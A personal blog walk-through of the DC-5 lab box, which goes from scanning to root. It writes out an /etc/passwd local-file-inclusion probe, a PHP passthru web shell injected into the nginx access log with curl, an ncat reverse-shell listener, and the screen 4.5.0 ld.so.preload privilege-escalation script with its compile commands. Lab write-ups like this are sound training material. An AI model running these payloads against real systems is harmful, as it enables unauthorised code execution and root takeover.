DC-5 Walk-Through

Another day!!, another box today I am working on DC-5 and it was great learned some awesome attacks and something so simple as “When All You Can Do Is Read” pretty informative give this one a google search, to sum this up it’s just, what would we do when all we can do is read on a box? When we can’t list directories but we can call the famous “/etc/passwd” you do this one because it’s always called on CTF but when you are working on an assessment and you can’t list well you start calling file’s that you know that are supposed to be there! This box was awesome a lot of enumeration of course started with s normal web page but it is all full with gibberish here the most subtle hint we receive is that the Copyright string the year gets changed every time we refresh the page so from here we can tell there is something going up with the thankyou.php directory after tweaking we can tell that it’s vulnerable to LFI from here we inject code to posing the access log file and get Code Execution then we can continue with the privilege escalation another SUID called screen 4.5.0 that with a little coding and compilation we can use this to escalate to root

Arp-Scan

[dmcxblue@blackarch ~]$ sudo arp-scan -l
Interface: enp0s3, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1	a4:08:f5:53:18:56	(Unknown)
192.168.1.9	84:4b:f5:63:d7:74	Hon Hai Precision Ind. Co.,Ltd.
192.168.1.175	00:c0:ca:96:e7:91	ALFA, INC.
192.168.1.119	30:d9:d9:54:6f:e2	(Unknown)
192.168.1.232	08:00:27:f2:aa:e5	Cadmus Computer Systems
192.168.1.169	88:de:a9:3c:5b:0d	Roku, Inc.
192.168.1.245	9c:ae:d3:ed:d2:7e	Seiko Epson Corporation

14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 1.982 seconds (129.16 hosts/sec). 7 responded

From here we will continue with nmap Scan

[dmcxblue@blackarch ~]$ nmap -sT -p- --min-rate 5000 192.168.1.232
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-04 10:12 PDT
Nmap scan report for dc-5 (192.168.1.232)
Host is up (0.00027s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
34932/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.60 seconds

Nmap targeted port scan

[dmcxblue@blackarch DC-5]$ nmap -sC -sV -p80,111,34932 192.168.1.232 -oA nmap/DC5
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-04 10:14 PDT
Nmap scan report for dc-5 (192.168.1.232)
Host is up (0.00036s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34932/tcp   status
|   100024  1          35803/tcp6  status
|   100024  1          42276/udp   status
|_  100024  1          46377/udp6  status
34932/tcp open  status  1 (RPC #100024)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.63 seconds

Gobuster

[dmcxblue@blackarch DC-5]$ gobuster -u http://192.168.1.232 -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o DC5-gobuster.log

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.232/
[+] Threads      : 50
[+] Wordlist     : /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2019/09/04 10:19:36 Starting gobuster
=====================================================
/index.php (Status: 200)
/images (Status: 301)
/contact.php (Status: 200)
/faq.php (Status: 200)
/solutions.php (Status: 200)
/footer.php (Status: 200)
/css (Status: 301)
/about-us.php (Status: 200)
/thankyou.php (Status: 200)
=====================================================
2019/09/04 10:20:26 Finished
=====================================================

Burp Suite

I proceeded to launch Burp-Suite for more detailed enumeration and testing since the webpage had nothing of interest just 2 php pages that were interactive the ‘contact.php’ and the thankyou.php

I moved onto poking around by intercepting the request with Burp and just adding special characters into the URL or any areas that I thought would make the web server crashes or give a response in any way with no success

Here I was using repeater to see if anything would crash or give a different response until I noticed that the Copyright footer would change years every time I refreshed it

2019
2018

After tinkering a couple times with the url I used the ?file=../../etc/passwd to test it for LFI and with a positive result from Burp Suite we get a response from the server.

After more research into this vulnerability there is an article showing step by step how to move from LFI to shell

LFI to Shell

Following these steps I will continue to get a shell

We see that we have access to the ‘access.log’ file so we will need to add php code into the logs and try an get code execution

We can use curl to inject the code in this step

[dmcxblue@blackarch ~]$ curl -i 'http://192.168.1.233/thankyou.php?file=<?php passthru($_GET['cmd']); ?>'
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Wed, 04 Sep 2019 19:14:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

We can verify on our curl command that we get Code Execution

curl -i 'http://192.168.1.233/thankyou.php?file=/var/log/nginx/access.log&cmd=id'

Now to receive a shell

Upgrade shell

[dmcxblue@blackarch DC-5]$ ncat -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.233.
Ncat: Connection from 192.168.1.233:35736.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash -i

which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

Here we will use the LinEnum.sh Script as it will save us a huge amount of time in enumeration this does not mean that we shouldn’t manually be checking but this verifies at least common exploits or misconfigurations mainly for CTF

In our SUID one of them stand’s out as it is not a common one on a linux machine to be shown with it’s version

-e \e[00;31m[-] SUID files:\e[00m
-rwsr-xr-x 1 root root 40168 May 18  2017 /bin/su
-rwsr-xr-x 1 root root 40000 Mar 30  2015 /bin/mount
-rwsr-xr-x 1 root root 27416 Mar 30  2015 /bin/umount
-rwsr-xr-x 1 root root 1441352 Apr 19 23:48 /bin/screen-4.5.0
-rwsr-xr-x 1 root root 75376 May 18  2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 89248 Nov 19  2017 /usr/bin/procmail
-rwsr-sr-x 1 daemon daemon 55424 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 54192 May 18  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 53616 May 18  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 39912 May 18  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44464 May 18  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 464904 Mar 25 23:07 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

We verify in Exploit-DB that there is a local privilege escalation for this SUID there are plenty of resources on how to exploit this vulnerability I used this blog post to compile and run this exploit as sometimes it doesn’t run as-is so you will need to manually compile and make this one work.

SUID

Once done we can confirm our root shell

These are the files we will be needing and compiling on our Attacking Box

Compile: 

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

gcc -o /tmp/rootshell /tmp/rootshell.c

Run by following these steps

We wills tart a python http server and send this to the victim box this has to be done after compiling in our own local machine

We will move our script.sh as-is so that the moment it runs it will execute all the needed steps to receive a root shell

dmcxblue@blackarch tmp]$ cat script.sh
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell

Then we execute

And we will get the flag

This box was awesome really interesting way to approach it and receive a shell also Black Arch Linux incredible OS all great so many tools! More than 2000 was just browsing and wanted to try a few other pen-testing Boxes see what’s going on out there, remember people there are so many way’s to hack!

[Not being sponsored or any of that the OS is all open-source and the authors are doing this in there spare time do go check them out and this OS also might heavy 26GB but still awesome, a few tools outdated such as gobuster as I noticed and a little buggy with SQLMAP but still that’s something that can be fixed and not a major thing to stop using this incredible OS, oh and I still went GNOME with it Lol]

Categories: DC Series, General

dmcxblue

Infosec Hobbyist, Wanna be Red-Teamer, Pentester Dreamer
OSCP | OSWP
GED- In Progress

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s